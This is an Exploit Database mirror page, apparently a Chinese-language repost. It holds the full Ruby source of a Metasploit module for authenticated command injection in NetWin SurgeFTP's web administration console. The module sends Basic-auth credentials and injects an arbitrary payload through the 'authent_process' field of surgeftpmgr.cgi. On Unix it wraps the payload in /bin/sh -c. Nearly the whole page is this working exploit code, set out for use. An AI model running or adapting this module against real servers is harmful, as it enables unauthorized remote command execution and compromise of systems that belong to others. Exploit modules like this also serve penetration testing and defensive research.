NetWin SurgeFTP – (Authenticated) Admin Command Injection (Metasploit)

• Exploit Database
• 140 阅读

• 作者： Spencer McIntyre
  日期： 2012-12-20
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/23522/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104

  require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;SurgeFTP Remote Command Execution&apos;, &apos;Description&apos;=> %q{ This module exploits a flaw in the SurgeFTP server&apos;s web-based administrative console to execute arbitary commands. }, &apos;Author&apos; => [ &apos;Spencer McIntyre&apos;, ], &apos;License&apos;=> MSF_LICENSE, &apos;References&apos; => [ ], &apos;Arch&apos; => ARCH_CMD, &apos;Platform&apos; => [&apos;unix&apos;, &apos;win&apos;], &apos;Payload&apos;=> { &apos;Space&apos; => 1024, &apos;DisableNops&apos; => true, }, &apos;Targets&apos;=> [ [ &apos;Windows&apos;, { &apos;modifier&apos; => "%s" }, ], [ &apos;Unix&apos;, { &apos;modifier&apos; => "/bin/sh -c \"%s\"" }, ], ], &apos;DefaultTarget&apos;=> 0, &apos;DisclosureDate&apos; => &apos;Dec 06 2012&apos;)) register_options( [ OptString.new(&apos;USERNAME&apos;, [ true, &apos;The username with admin role to authenticate as&apos;, &apos;admin&apos; ]), OptString.new(&apos;PASSWORD&apos;, [ true, &apos;The password for the specified username&apos;, &apos;password&apos; ]), ], self.class)   end   def exploit user_pass = Rex::Text.encode_base64(datastore[&apos;USERNAME&apos;] + ":" + datastore[&apos;PASSWORD&apos;]) command = target[&apos;modifier&apos;] % payload.encoded print_status("Invoking command") res = send_request_cgi( { &apos;uri&apos; => &apos;/cgi/surgeftpmgr.cgi&apos;, &apos;method&apos;=> &apos;POST&apos;, &apos;headers&apos; => { &apos;Authorization&apos; => "Basic #{user_pass}", }, &apos;vars_post&apos; => { &apos;global_smtp&apos; => "", &apos;global_restart&apos; => "", &apos;global_style&apos; => "", &apos;global_bind&apos; => "", &apos;global_passive_ip&apos; => "", &apos;global_passive_match&apos; => "", &apos;global_logon_mode&apos; => "", &apos;global_log_host&apos; => "", &apos;global_login_error&apos; => "", &apos;global_adminip&apos; => "", &apos;global_total_users&apos; => "", &apos;global_con_perip&apos; => "", &apos;global_ssl&apos; => "", &apos;global_ssl_cipher_list&apos; => "", &apos;global_implicit_port&apos; => "", &apos;log_level&apos; => "", &apos;log_home&apos; => "", &apos;global_watcher_program_ul&apos; => "", &apos;global_watcher_program_dl&apos; => "", &apos;authent_process&apos; => command, &apos;authent_cmdopts&apos; => "", &apos;authent_number&apos; => "", &apos;authent_domain&apos; => "", &apos;global_strip_user_domain&apos; => "", &apos;global_noclass&apos; => "", &apos;global_anon_hammer_over_time&apos; => "", &apos;global_anon_hammer_max&apos; => "", &apos;global_anon_hammer_block_time&apos; => "", &apos;global_port&apos; => "", &apos;global_mgr_port&apos; => "", &apos;global_mgr_ssl_port&apos; => "", &apos;cmd_global_save.x&apos; => "36", &apos;cmd_global_save.y&apos; => "8", } }) if not (res and res.code == 200) print_error("Failed to execute command") else print_status("Done") end end end